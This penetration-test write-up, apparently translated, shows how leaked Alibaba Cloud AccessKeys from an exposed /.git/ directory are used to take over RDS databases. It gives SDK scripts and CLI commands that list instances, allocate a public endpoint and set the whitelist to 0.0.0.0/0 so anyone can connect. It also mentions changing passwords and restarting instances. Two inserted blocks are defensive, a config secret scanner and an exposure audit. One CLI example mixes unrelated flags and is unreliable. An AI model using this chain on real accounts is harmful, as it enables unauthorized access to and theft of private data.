While supporting a certain province's WA pre-engagement penetration reconnaissance (CX), I obtained the website's source code through an exposed /.git/ directory. Reading the configuration files showed that the system used OSS for file storage; the configuration looked like this:
```
ACCESSKEYID=XXXXX
ACCESSKEYSECRET=XXXXX
ENDPOINT=oss-cn-beijing.aliyuncs.com
DB_HOST=rm-xxxxx.mysql.rds.aliyuncs.com
DB_PORT=3306
DB_USER=xxxx
DB_PASSWORD=xxxxx
```
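As an added example (my code, not the write-up's), the following pre-commit or CI check would have flagged this configuration before it was ever committed to a repository that could later be served from /.git/. It scans KEY=VALUE files for the sensitive key names seen above and reports any that carry a live value rather than a placeholder. The sample configs are constructed; the "LTAI" prefix check is an assumption about the common Alibaba Cloud AccessKey ID format, not something the write-up states.

```python
import re

# Constructed config in the KEY=VALUE form shown in the write-up (the real values
# there are masked with X's; these are made up for the example).
SAMPLE_CONFIG = """\
ACCESSKEYID=LTAI4GconstructedExampleId
ACCESSKEYSECRET=constructedSecretValue1234567890
ENDPOINT=oss-cn-beijing.aliyuncs.com
DB_HOST=rm-constructed.mysql.rds.aliyuncs.com
DB_PORT=3306
DB_USER=app
DB_PASSWORD=constructedDbPassword
"""

# The same file with placeholders instead of secrets, as it should be committed.
TEMPLATE_CONFIG = """\
ACCESSKEYID=${ALIYUN_ACCESS_KEY_ID}
ACCESSKEYSECRET=${ALIYUN_ACCESS_KEY_SECRET}
ENDPOINT=oss-cn-beijing.aliyuncs.com
DB_HOST=rm-constructed.mysql.rds.aliyuncs.com
DB_PORT=3306
DB_USER=app
DB_PASSWORD=XXXXX
"""

# Key names taken from the leaked config in the write-up.
SENSITIVE_KEYS = {"ACCESSKEYID", "ACCESSKEYSECRET", "DB_PASSWORD"}
# Values that are clearly placeholders: runs of X, <angle-bracket>, ${ENV_VAR}, or empty.
PLACEHOLDER_RE = re.compile(r"^(x+|<[^>]*>|\$\{[^}]*\}|)$", re.IGNORECASE)
# Assumption: Alibaba Cloud AccessKey IDs commonly begin with "LTAI"; adjust for your tenant.
ALIYUN_AK_ID_RE = re.compile(r"^LTAI[A-Za-z0-9]{12,24}$")


def find_hardcoded_secrets(config_text):
    """Return (line number, key, reason) for every line that carries a live secret."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().upper()
        value = value.strip().strip("'\"")
        if key in SENSITIVE_KEYS and not PLACEHOLDER_RE.match(value):
            findings.append((lineno, key, "hardcoded secret"))
        elif ALIYUN_AK_ID_RE.match(value):
            # Catches an AccessKey ID stored under an unexpected key name.
            findings.append((lineno, key, "value looks like an AccessKey ID"))
    return findings


if __name__ == "__main__":
    for finding in find_hardcoded_secrets(SAMPLE_CONFIG):
        print("line %d: %s (%s)" % finding)
```

Run it over staged files in a pre-commit hook and fail the commit on any finding; the secrets then live in environment variables or a secret store, and the web server should additionally deny requests for /.git/ so a committed history can never be pulled through the site.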
I knew from earlier work that with an AccessKey ID of the root account (not a RAM sub-account) you can obtain control of the Alibaba Cloud servers; some operations platforms, for example, support exactly this kind of use.

But I did not know the passwords for those servers, and even if I had, most of the servers in the VPC only exposed ports 80 and 443 to the outside, and a login from an unfamiliar location triggers an alert. That approach was not viable.
I had the MySQL credentials, but a ping showed the host resolved to an internal IP: the server sat inside a VPC, and the database only accepted connections from the internal network. What do we do then? Most people would be stuck here.
The main goal was to analyze the data, but RDS would not accept the connection. Reading through Alibaba Cloud's documentation, I found that RDS can also be operated with an AccessKey.
The Rdscli tool can be downloaded from the Alibaba Cloud site: https://market.aliyun.com/products/53690006/cmgj000311.html#sku=mianfeiban
See its documentation for configuration; I won't repeat it here, since the docs cover it.
List the RDS instances under the account using the key:
```
rds DescribeDBInstances --PageSize 50
```
The output:
```
[root@localhost Rdscli]# rds DescribeDBInstances --PageSize 50
--------------------------------------------------------------
|                     DescribeDBInstances                    |
+-------------------+----------------------------------------+
|  PageNumber       |  1                                     |
|  PageRecordCount  |  6                                     |
|  RequestId        |  XXXXXXXX-XXXX-4A0B-97C1-C5XXXXXXXXXX  |
|  TotalRecordCount |  6                                     |
+-------------------+----------------------------------------+
||                          Items                           ||
|+----------------------------------------------------------+|
|||                       DBInstance                       |||
||+-------------------------+------------------------------+||
|||  ConnectionMode         |  Standard                    |||
|||  CreateTime             |  2020-08-14T12:46:23Z        |||
|||  DBInstanceClass        |  rds.mysql.s3.large          |||
|||  DBInstanceDescription  |  rr-XXXXXXXXXXXXXXXXX        |||
|||  DBInstanceId           |  rr-XXXXXXXXXXXXXXXXX        |||
|||  DBInstanceNetType      |  Intranet                    |||
|||  DBInstanceStatus       |  Running                     |||
|||  DBInstanceStorageType  |                              |||
|||  DBInstanceType         |  Readonly                    |||
|||  Engine                 |  MySQL                       |||
|||  EngineVersion          |  8.0                         |||
|||  ExpireTime             |  2020-10-14T16:00:00Z        |||
|||  InsId                  |  1                           |||
|||  InstanceNetworkType    |  VPC                         |||
|||  LockMode               |  Unlock                      |||
|||  LockReason             |                              |||
|||  MasterInstanceId       |  rm-XXXXXXXXXXXXXXXXX        |||
|||  MutriORsignle          |  False                       |||
|||  PayType                |  Prepaid                     |||
|||  RegionId               |  cn-beijing                  |||
|||  ResourceGroupId        |  rg-XXXXXXXXXXXXXXX          |||
|||  VSwitchId              |  vsw-XXXXXXXXXXXXXXXXXXXXX   |||
|||  VpcCloudInstanceId     |  rr-XXXXXXXXXXXXXXXXX        |||
|||  VpcId                  |  vpc-XXXXXXXXXXXXXXXXXXXXX   |||
|||  ZoneId                 |  cn-beijing-h                |||
||+-------------------------+------------------------------+||
```
Using an instance ID returned by the tool, look at that instance's details:
```
rds ExportDBInstance --DBInstanceId rr-XXXXXXX --filename test
```
The detailed instance information returned:
```json
{
  "Items": {
    "DBInstanceAttribute": [
      {
        "Category": "HighAvailability",
        "SupportUpgradeAccountType": "No",
        "InsId": 1,
        "LockMode": "Unlock",
        "ConnectionString": "rr-xxxxxxxxxx.mysql.rds.aliyuncs.com",
        "MasterInstanceId": "rm-xxxxxxxxxxxx",
        "DBInstanceStorageType": "local_ssd",
        "DBInstanceNetType": "Intranet",
        "ReadDelayTime": "0",
        "ReadOnlyDBInstanceIds": { "ReadOnlyDBInstanceId": [] },
        "SupportCreateSuperAccount": "No",
        "MaxConnections": 2000,
        "DBInstanceClassType": "x",
        "Engine": "MySQL",
        "AvailabilityValue": "100.0%",
        "CanTempUpgrade": true,
        "VpcId": "vpc-xxxxxxxxxxx",
        "IPType": "IPv4",
        "DBMaxQuantity": 99999,
        "ConnectionMode": "Standard",
        "RegionId": "cn-beijing",
        "SlaveZones": { "SlaveZone": [] },
        "ResourceGroupId": "rg-xxxx",
        "VSwitchId": "vsw-xxxxxx",
        "InstanceNetworkType": "VPC",
        "ExpireTime": "2020-10-14T16:00:00Z",
        "ConsoleVersion": "",
        "DBInstanceType": "Readonly",
        "DBInstanceStatus": "Running",
        "ProxyType": 0,
        "DispenseMode": "ClassicDispenseMode",
        "CreationTime": "2020-08-14T12:46:23Z",
        "SecurityIPMode": "normal",
        "SuperPermissionMode": "",
        "AutoUpgradeMinorVersion": "Auto",
        "EngineVersion": "8.0",
        "CurrentKernelVersion": "rds_20200630",
        "DBInstanceDiskUsed": 67697115136,
        "IncrementSourceDBInstanceId": "rm-xxxxxxx",
        "VpcCloudInstanceId": "rr-xxxxxxx",
        "DBInstanceMemory": 8192,
        "MaxIOPS": 5000,
        "DedicatedHostGroupId": "",
        "DBInstanceStorage": 100,
        "DBInstanceDescription": "rr-xxxxxxx",
        "Extra": { "DBInstanceIds": { "DBInstanceId": [] } },
        "LatestKernelVersion": "rds_20200630",
        "DBInstanceId": "rr-xxxxxxxxxxxx",
        "PayType": "Prepaid",
        "AccountMaxQuantity": 99999,
        "OriginConfiguration": "",
        "MaintainTime": "18:00Z-22:00Z",
        "DBInstanceCPU": "4",
        "AccountType": "Mix",
        "DBInstanceClass": "rds.mysql.s3.large",
        "SecurityIPList": "",
        "Port": "3306",
        "ZoneId": "cn-beijing-h"
      }
    ]
  },
  "RequestId": "A1A4E351-1778-xxxx-9D57-xxxxxxx"
}
```
I then registered my own Alibaba Cloud account to see what the RDS platform offers:

After registering I found that RDS actually has separate internal and public domain names. The public address is not enabled by default and has to be requested, and the RDS ConnectionString I had looked at was clearly an internal address.
Searching the official API documentation, I found an API that supports this:
Call the AllocateInstancePublicConnection interface to request a public address for the instance:
https://help.aliyun.com/document_detail/26234.html?spm=a2c4g.11186623.6.1655.6eb83c34jOC0ON
The code to request a public address:
```python
#!/usr/bin/env python
#coding=utf-8

from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkrds.request.v20140815.AllocateInstancePublicConnectionRequest import AllocateInstancePublicConnectionRequest

# Region must match the instance's RegionId (cn-beijing in the listing above)
client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing')

request = AllocateInstancePublicConnectionRequest()
request.set_accept_format('json')

request.set_DBInstanceId("DBInstanceId")
request.set_ConnectionStringPrefix("public_domain")
request.set_Port("3306")

response = client.do_action_with_exception(request)
# python2:  print(response)
print(str(response, encoding='utf-8'))
```
Once the public domain name is enabled, query the RDS instance's connection addresses again.
Call the DescribeDBInstanceNetInfo interface to query all of the instance's connection addresses:
```python
#!/usr/bin/env python
#coding=utf-8

from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkrds.request.v20140815.DescribeDBInstanceNetInfoRequest import DescribeDBInstanceNetInfoRequest

# The documentation sample uses 'cn-hangzhou'; the region must match the
# instance's RegionId, which is cn-beijing in the listing above
client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing')

request = DescribeDBInstanceNetInfoRequest()
request.set_accept_format('json')

request.set_DBInstanceId("DBInstanceId")

response = client.do_action_with_exception(request)
# python2:  print(response)
print(str(response, encoding='utf-8'))
```
The response:
```json
{
  "RequestId": "xxxx-xx-xx-xx-xxxxxxx",
  "DBInstanceNetInfos": {
    "DBInstanceNetInfo": [
      {
        "IPType": "Private",
        "VPCId": "vpc-xxxxxxxxx",
        "Port": "3306",
        "VSwitchId": "vsw-xxxxxx",
        "Upgradeable": "Disabled",
        "ConnectionString": "rm-xxxxxx.mysql.rds.aliyuncs.com",
        "IPAddress": "172.xx.xxx.xxx",
        "SecurityIPGroups": { "securityIPGroup": [] },
        "DBInstanceWeights": { "DBInstanceWeight": [] },
        "ConnectionStringType": "Normal"
      },
      {
        "IPType": "Public",
        "VPCId": "",
        "Port": "3306",
        "VSwitchId": "",
        "Upgradeable": "Disabled",
        "ConnectionString": "rm-xxxxxxxxxxx.mysql.rds.aliyuncs.com",
        "IPAddress": "xxx.xxx.xxx.xxx",
        "SecurityIPGroups": { "securityIPGroup": [] },
        "DBInstanceWeights": { "DBInstanceWeight": [] },
        "ConnectionStringType": "Normal"
      }
    ]
  },
  "SecurityIPMode": "normal",
  "InstanceNetworkType": "VPC"
}
```
That gives us the RDS public address. After obtaining it, though, the port turned out to be unreachable.
Testing showed that my own instance was unreachable too, so it had to be a network issue. Checking the documentation:
Resolving "RDS cannot be accessed over the public network": https://help.aliyun.com/knowledge_detail/96028.html#2
1. Confirm that the IP address accessing the RDS instance has been added to the RDS whitelist. If it has not, see "Configure a whitelist" and add it.
2. Check the ECS instance's security group.
Log in to the ECS console.
Find the instance, click Manage to open its detail page, and in the left navigation click Security Groups for this instance. Confirm that the outbound internal-network rules contain no policy restricting access to the RDS instance.
Check whether high-security whitelist mode is enabled; see "High-security whitelist mode". If it is, make sure the device's public IP address has been added to the classic-network group.
Note: the VPC group does not apply to the public network.
3. Check the RDS instance's status to see whether it has been locked because disk usage exceeded the purchased specification. While the instance is locked, applications cannot read from or write to the RDS database; see "How to troubleshoot automatic locking after a MySQL instance runs out of space".
4. Review the RDS instance's performance monitoring.
For other performance problems, see "Resolving high CPU, memory, space and IOPS usage".
If the growth comes from normal business, we recommend upgrading the instance configuration.
Note: the upgrade may cause a single brief disconnection of about 30 s; implement reconnection logic so that your business keeps running. See "RDS usage notes" for details.
5. Confirm that the public IP address added to the whitelist is the device's real egress IP. Wrong IP addresses usually result from one of the following:
The device's public IP address is not fixed and may change.
The public IP reported by an IP lookup tool or website is inaccurate. For how to determine the device's public IP, see "Locate your local IP".
6. Confirm that the connection address in use is the RDS public address.
I checked my own instance:

The RDS whitelist defaults to 127.0.0.1, which rejects everything, so we need to change it to allow our connection; then the firewall no longer leaves the port unreachable.
First, query the IP whitelist.
Call the DescribeDBInstanceIPArrayList interface to query the RDS instance's IP whitelist:
https://help.aliyun.com/document_detail/26241.html?spm=a2c4g.11186623.6.1715.34013a167E3PKs
Call the DescribeDBInstanceAttribute interface to query the RDS instance's details:
https://help.aliyun.com/document_detail/26231.html?spm=5176.10695662.1996646101.searchclickresult.5afd39f8vo1M3l
```python
from aliyunsdkcore.client import AcsClient
from aliyunsdkrds.request.v20140815.DescribeDBInstanceIPArrayListRequest import DescribeDBInstanceIPArrayListRequest

client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-beijing')

# Query the IP whitelist
request = DescribeDBInstanceIPArrayListRequest()
request.set_accept_format('json')
request.set_DBInstanceId("rm-2ze8wbh1ci8i24zgq")
response = client.do_action_with_exception(request)
print(str(response, encoding='utf-8'))
```
Then add an entry to the IP whitelist.
Call the ModifySecurityIps interface to modify the RDS instance's IP whitelist:
https://help.aliyun.com/document_detail/26242.html?spm=a2c4g.11186623.6.1717.14755667CITNGy
```python
from aliyunsdkcore.client import AcsClient
from aliyunsdkrds.request.v20140815.ModifySecurityIpsRequest import ModifySecurityIpsRequest

client = AcsClient('xxxxx', 'xxxxxxx', 'cn-beijing')

# Modify the IP whitelist
request = ModifySecurityIpsRequest()
request.set_accept_format('json')
request.set_DBInstanceId("rm-xxxxxxx")
request.set_SecurityIps("0.0.0.0/0")
response = client.do_action_with_exception(request)
# python2:  print(response)
print(str(response, encoding='utf-8'))
```
With the whitelist set to 0.0.0.0/0, anyone on the internet can connect.
With that, we have the RDS public domain name and public access to the RDS instance.
The tool's commands mentioned earlier also provide some of these functions:
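As an added example (my code, not the write-up's and not Alibaba Cloud's), here is an audit routine that parses the two responses this section relies on, DescribeDBInstanceNetInfo and DescribeDBInstanceIPArrayList, and flags the exact end state described above: an instance that has a public endpoint together with a whitelist entry admitting every address. The sample responses are constructed to match the shape shown earlier; the DescribeDBInstanceIPArrayList layout (Items.DBInstanceIPArray[].SecurityIPList, comma-separated) is assumed from the API as I know it, and the /24 breadth threshold is a policy choice of this example, not anything from the page.

```python
import ipaddress
import json

# Widest prefix accepted without a finding (policy choice, assumption of this example).
MAX_PREFIX_WIDTH = 24

# Constructed DescribeDBInstanceNetInfo response, shaped like the one in the write-up.
NET_INFO_SAMPLE = json.dumps({
    "RequestId": "constructed-request-id",
    "DBInstanceNetInfos": {"DBInstanceNetInfo": [
        {"IPType": "Private", "VPCId": "vpc-constructed", "Port": "3306",
         "ConnectionString": "rm-constructed.mysql.rds.aliyuncs.com",
         "IPAddress": "172.16.0.10", "ConnectionStringType": "Normal"},
        {"IPType": "Public", "VPCId": "", "Port": "3306",
         "ConnectionString": "rm-constructedpub.mysql.rds.aliyuncs.com",
         "IPAddress": "203.0.113.25", "ConnectionStringType": "Normal"},
    ]},
    "SecurityIPMode": "normal",
    "InstanceNetworkType": "VPC",
})

# Constructed DescribeDBInstanceIPArrayList responses (layout assumed, see lead-in):
# the default whitelist, and one that has been opened to the whole internet.
IP_ARRAY_DEFAULT = json.dumps({"Items": {"DBInstanceIPArray": [
    {"DBInstanceIPArrayName": "default", "DBInstanceIPArrayAttribute": "",
     "SecurityIPList": "127.0.0.1"}]}, "RequestId": "constructed-request-id"})
IP_ARRAY_OPEN = json.dumps({"Items": {"DBInstanceIPArray": [
    {"DBInstanceIPArrayName": "default", "DBInstanceIPArrayAttribute": "",
     "SecurityIPList": "0.0.0.0/0,10.0.0.0/8"}]}, "RequestId": "constructed-request-id"})


def parse_security_ips(ip_array_json):
    """Return (group name, raw entry) pairs from a DescribeDBInstanceIPArrayList response."""
    data = json.loads(ip_array_json)
    pairs = []
    for group in data["Items"]["DBInstanceIPArray"]:
        for raw in group.get("SecurityIPList", "").split(","):
            raw = raw.strip()
            if raw:
                pairs.append((group["DBInstanceIPArrayName"], raw))
    return pairs


def audit_whitelist(ip_array_json):
    """Flag whitelist entries that admit the whole internet or a very wide range."""
    findings = []
    for group, raw in parse_security_ips(ip_array_json):
        try:
            net = ipaddress.ip_network(raw, strict=False)
        except ValueError:
            findings.append(f"group '{group}': unparsable entry {raw!r}")
            continue
        if net.prefixlen == 0:
            findings.append(f"group '{group}': {raw} admits every address")
        elif net.prefixlen < MAX_PREFIX_WIDTH:
            findings.append(f"group '{group}': {raw} is wider than /{MAX_PREFIX_WIDTH}")
    return findings


def public_endpoints(net_info_json):
    """Return the public connection strings from a DescribeDBInstanceNetInfo response."""
    data = json.loads(net_info_json)
    return [
        f"{ep['ConnectionString']}:{ep['Port']} ({ep['IPAddress']})"
        for ep in data["DBInstanceNetInfos"]["DBInstanceNetInfo"]
        if ep.get("IPType") == "Public"
    ]


def audit_instance(net_info_json, ip_array_json):
    """Combine both checks: exposed means a public endpoint plus an any-address whitelist entry."""
    endpoints = public_endpoints(net_info_json)
    whitelist = audit_whitelist(ip_array_json)
    exposed = bool(endpoints) and any("every address" in f for f in whitelist)
    return {"public_endpoints": endpoints, "whitelist_findings": whitelist,
            "internet_exposed": exposed}


if __name__ == "__main__":
    print(json.dumps(audit_instance(NET_INFO_SAMPLE, IP_ARRAY_OPEN), indent=2))
```

Feed it the real JSON saved from those two calls for each instance returned by DescribeDBInstances, and schedule it: a public endpoint appearing on an instance that used to be Intranet-only, or a whitelist suddenly containing 0.0.0.0/0, is exactly the change this write-up makes and is worth an alert regardless of who made it.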
```
[root@localhost Rdscli]# rds help
usage: rds <operation> [options and parameters]
[rds] valid operations as follows:
CancelImport                         | CreateAccount
CreateBackup                         | CreateDBInstance
CreateDBInstanceForChannel           | CreateDBInstanceforFirstPay
CreateDatabase                       | CreatePostpaidDBInstance
CreateTempDBInstance                 | CreateUploadPathForSQLServer
DeleteAccount                        | DeleteDBInstance
DeleteDatabase                       | DescribeAccounts
DescribeBackupPolicy                 | DescribeBackups
DescribeBinlogFiles                  | DescribeDBInstanceAttribute
DescribeDBInstancePerformance        | DescribeDBInstances
DescribeDatabases                    | DescribeErrorLogs
DescribeFilesForSQLServer            | DescribeImportsForSQLServer
DescribeOptimizeAdviceByDBA          | DescribeOptimizeAdviceOnBigTable
DescribeOptimizeAdviceOnExcessIndex  | DescribeOptimizeAdviceOnMissIndex
DescribeOptimizeAdviceOnMissPK       | DescribeOptimizeAdviceOnStorage
DescribeParameterTemplates           | DescribeParameters
DescribeRegions                      | DescribeResourceUsage
DescribeSQLLogRecords                | DescribeSQLLogReports
DescribeSlowLogRecords               | DescribeSlowLogs
ExportDBInstance                     | GrantAccountPrivilege
ImportDBInstance                     | ImportDataForSQLServer
ImportDatabaseBetweenInstances       | ModifyAccountDescription
ModifyBackupPolicy                   | ModifyDBDescription
ModifyDBInstanceDescription          | ModifyDBInstanceMaintainTime
ModifyDBInstanceSpec                 | ModifyParameter
ModifyPostpaidDBInstanceSpec         | ModifySecurityIps
PurgeDBInstanceLog                   | ResetAccountPassword
RestartDBInstance                    | RevokeAccountPrivilege
SwitchDBInstanceNetType              | UpgradeDBInstanceEngineVersion
```
For example:
```
rds ExportDBInstance --DBInstanceId rr-xxxxx --ModifySecurityIps 0.0.0.0/0
```
Just like the Python script, this makes the instance reachable from the public network.
In the same way we could also open a security group, change the RDS password, restart RDS, and so on.
RDS API reference:
https://help.aliyun.com/document_detail/182821.html?spm=a2c4g.11186623.2.10.4b1b2eb15RxpE2#doc-8073
